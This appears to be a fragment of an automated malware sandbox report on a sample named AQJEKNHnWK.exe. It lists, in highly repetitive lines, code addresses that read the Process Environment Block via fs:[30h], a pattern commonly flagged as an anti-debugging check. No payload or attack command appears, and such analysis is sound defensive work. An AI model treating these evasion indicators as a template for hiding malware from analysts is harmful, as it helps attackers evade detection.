          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B171 mov eax, dword ptr fs:[00000030h]1_2_00A6B171
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6B171 mov eax, dword ptr fs:[00000030h]1_2_00A6B171
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8B944 mov eax, dword ptr fs:[00000030h]1_2_00A8B944
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8B944 mov eax, dword ptr fs:[00000030h]1_2_00A8B944
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A7AAB0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A7AAB0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A9FAB0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9D294 mov eax, dword ptr fs:[00000030h]1_2_00A9D294
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9D294 mov eax, dword ptr fs:[00000030h]1_2_00A9D294
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92AE4 mov eax, dword ptr fs:[00000030h]1_2_00A92AE4
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92ACB mov eax, dword ptr fs:[00000030h]1_2_00A92ACB
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA4A2C mov eax, dword ptr fs:[00000030h]1_2_00AA4A2C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA4A2C mov eax, dword ptr fs:[00000030h]1_2_00AA4A2C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2AA16 mov eax, dword ptr fs:[00000030h]1_2_00B2AA16
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2AA16 mov eax, dword ptr fs:[00000030h]1_2_00B2AA16
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A78A0A mov eax, dword ptr fs:[00000030h]1_2_00A78A0A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6AA16 mov eax, dword ptr fs:[00000030h]1_2_00A6AA16
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6AA16 mov eax, dword ptr fs:[00000030h]1_2_00A6AA16
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A83A1C mov eax, dword ptr fs:[00000030h]1_2_00A83A1C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov ecx, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA927A mov eax, dword ptr fs:[00000030h]1_2_00AA927A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1B260 mov eax, dword ptr fs:[00000030h]1_2_00B1B260
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1B260 mov eax, dword ptr fs:[00000030h]1_2_00B1B260
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38A62 mov eax, dword ptr fs:[00000030h]1_2_00B38A62
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2EA55 mov eax, dword ptr fs:[00000030h]1_2_00B2EA55
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AF4257 mov eax, dword ptr fs:[00000030h]1_2_00AF4257
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]1_2_00A94BAD
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]1_2_00A94BAD
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]1_2_00A94BAD
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B35BA5 mov eax, dword ptr fs:[00000030h]1_2_00B35BA5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A71B8F mov eax, dword ptr fs:[00000030h]1_2_00A71B8F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A71B8F mov eax, dword ptr fs:[00000030h]1_2_00A71B8F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1D380 mov ecx, dword ptr fs:[00000030h]1_2_00B1D380
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2138A mov eax, dword ptr fs:[00000030h]1_2_00B2138A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9B390 mov eax, dword ptr fs:[00000030h]1_2_00A9B390
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92397 mov eax, dword ptr fs:[00000030h]1_2_00A92397
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A8DBE9
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE53CA mov eax, dword ptr fs:[00000030h]1_2_00AE53CA
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE53CA mov eax, dword ptr fs:[00000030h]1_2_00AE53CA
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2131B mov eax, dword ptr fs:[00000030h]1_2_00B2131B
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A6DB60
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A93B7A mov eax, dword ptr fs:[00000030h]1_2_00A93B7A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A93B7A mov eax, dword ptr fs:[00000030h]1_2_00A93B7A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6DB40 mov eax, dword ptr fs:[00000030h]1_2_00A6DB40
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38B58 mov eax, dword ptr fs:[00000030h]1_2_00B38B58
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6F358 mov eax, dword ptr fs:[00000030h]1_2_00A6F358
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7849B mov eax, dword ptr fs:[00000030h]1_2_00A7849B
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B214FB mov eax, dword ptr fs:[00000030h]1_2_00B214FB
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AE6CF0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AE6CF0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AE6CF0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38CD6 mov eax, dword ptr fs:[00000030h]1_2_00B38CD6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9BC2C mov eax, dword ptr fs:[00000030h]1_2_00A9BC2C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]1_2_00B3740D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]1_2_00B3740D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]1_2_00B3740D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8746D mov eax, dword ptr fs:[00000030h]1_2_00A8746D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A44B mov eax, dword ptr fs:[00000030h]1_2_00A9A44B
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFC450 mov eax, dword ptr fs:[00000030h]1_2_00AFC450
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFC450 mov eax, dword ptr fs:[00000030h]1_2_00AFC450
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A935A1 mov eax, dword ptr fs:[00000030h]1_2_00A935A1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]1_2_00A91DB5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]1_2_00A91DB5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]1_2_00A91DB5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B305AC mov eax, dword ptr fs:[00000030h]1_2_00B305AC
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B305AC mov eax, dword ptr fs:[00000030h]1_2_00B305AC
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9FD9B mov eax, dword ptr fs:[00000030h]1_2_00A9FD9B
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9FD9B mov eax, dword ptr fs:[00000030h]1_2_00A9FD9B
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B18DF1 mov eax, dword ptr fs:[00000030h]1_2_00B18DF1
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A7D5E0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A7D5E0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov ecx, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38D34 mov eax, dword ptr fs:[00000030h]1_2_00B38D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2E539 mov eax, dword ptr fs:[00000030h]1_2_00B2E539
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]1_2_00A94D3B
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]1_2_00A94D3B
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]1_2_00A94D3B
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6AD30 mov eax, dword ptr fs:[00000030h]1_2_00A6AD30
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AEA537 mov eax, dword ptr fs:[00000030h]1_2_00AEA537
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8C577 mov eax, dword ptr fs:[00000030h]1_2_00A8C577
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8C577 mov eax, dword ptr fs:[00000030h]1_2_00A8C577
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA3D43 mov eax, dword ptr fs:[00000030h]1_2_00AA3D43
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE3540 mov eax, dword ptr fs:[00000030h]1_2_00AE3540
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A87D50 mov eax, dword ptr fs:[00000030h]1_2_00A87D50
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE46A7 mov eax, dword ptr fs:[00000030h]1_2_00AE46A7
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]1_2_00B30EA5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]1_2_00B30EA5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B30EA5 mov eax, dword ptr fs:[00000030h]1_2_00B30EA5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFFE87 mov eax, dword ptr fs:[00000030h]1_2_00AFFE87
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A776E2 mov eax, dword ptr fs:[00000030h]1_2_00A776E2
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A916E0 mov ecx, dword ptr fs:[00000030h]1_2_00A916E0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B38ED6 mov eax, dword ptr fs:[00000030h]1_2_00B38ED6
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A936CC mov eax, dword ptr fs:[00000030h]1_2_00A936CC
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA8EC7 mov eax, dword ptr fs:[00000030h]1_2_00AA8EC7
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B1FEC0
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6E620 mov eax, dword ptr fs:[00000030h]1_2_00A6E620
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B1FE3F mov eax, dword ptr fs:[00000030h]1_2_00B1FE3F
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]1_2_00A6C600
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]1_2_00A6C600
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A6C600 mov eax, dword ptr fs:[00000030h]1_2_00A6C600
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A98E00 mov eax, dword ptr fs:[00000030h]1_2_00A98E00
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A61C mov eax, dword ptr fs:[00000030h]1_2_00A9A61C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A61C mov eax, dword ptr fs:[00000030h]1_2_00A9A61C
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B21608 mov eax, dword ptr fs:[00000030h]1_2_00B21608
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A7766D mov eax, dword ptr fs:[00000030h]1_2_00A7766D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2AE44 mov eax, dword ptr fs:[00000030h]1_2_00B2AE44
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B2AE44 mov eax, dword ptr fs:[00000030h]1_2_00B2AE44
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A78794 mov eax, dword ptr fs:[00000030h]1_2_00A78794
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]1_2_00AE7794
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]1_2_00AE7794
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]1_2_00AE7794
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AA37F5 mov eax, dword ptr fs:[00000030h]1_2_00AA37F5
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A64F2E mov eax, dword ptr fs:[00000030h]1_2_00A64F2E
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A64F2E mov eax, dword ptr fs:[00000030h]1_2_00A64F2E
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9E730 mov eax, dword ptr fs:[00000030h]1_2_00A9E730
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A70E mov eax, dword ptr fs:[00000030h]1_2_00A9A70E
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A9A70E mov eax, dword ptr fs:[00000030h]1_2_00A9A70E
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3070D mov eax, dword ptr fs:[00000030h]1_2_00B3070D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00B3070D mov eax, dword ptr fs:[00000030h]1_2_00B3070D
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00A8F716 mov eax, dword ptr fs:[00000030h]1_2_00A8F716
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFFF10 mov eax, dword ptr fs:[00000030h]1_2_00AFFF10
          Source: C:\Users\user\Desktop\AQJEKNHnWK.exeCode function: 1_2_00AFFF10 mov eax, dword ptr fs:[00000030h]1_2_00AFFF10
